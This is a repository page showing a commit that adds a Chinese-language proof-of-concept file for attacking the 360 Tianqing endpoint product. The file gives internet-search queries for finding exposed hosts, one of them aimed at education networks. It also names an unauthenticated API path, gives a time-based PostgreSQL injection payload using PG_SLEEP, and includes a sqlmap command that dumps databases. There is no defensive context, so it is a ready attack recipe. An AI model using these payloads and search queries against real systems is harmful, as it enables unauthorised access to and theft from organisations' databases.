admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 360天擎 - 未授权与sql注入.md

Browse Source
This commit is contained in:
wy876 2023-10-18 18:38:23 +08:00 committed by GitHub
parent 96fa95dd85
commit 80bc9aeea9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
360天擎 - 未授权与sql注入.md Normal file
View File

@ -0,0 +1,24 @@
## 360天擎 - 未授权与sql注入
## FOFA语法
```title="360新天擎"```
## 鹰图
```web.title="360新天擎"&& ip.isp="教育"```
## 漏洞复现
### 未授权漏洞
```路由后拼接/api/dbstat/gettablessize```
### sql注入漏洞
比较推荐的方式先测试是否存在数据库信息泄露存在的话大概率存在SQL注入
```
路由后拼接/api/dp/rptsvcsyncpoint?ccid=1
{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
```
## sqlmap
python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1